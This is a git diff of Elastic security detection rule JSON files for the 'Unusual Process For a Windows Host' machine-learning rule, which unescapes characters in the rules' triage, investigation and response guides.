@@ ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json index 953354c28f0..5497754f792 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json @@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json index 8ce0b73a9a0..e7fe1d4b32c 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json @@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json index 1bdb3de316b..36897a50980 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json @@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json index d9442d13117..a0e102a1e54 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json @@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified 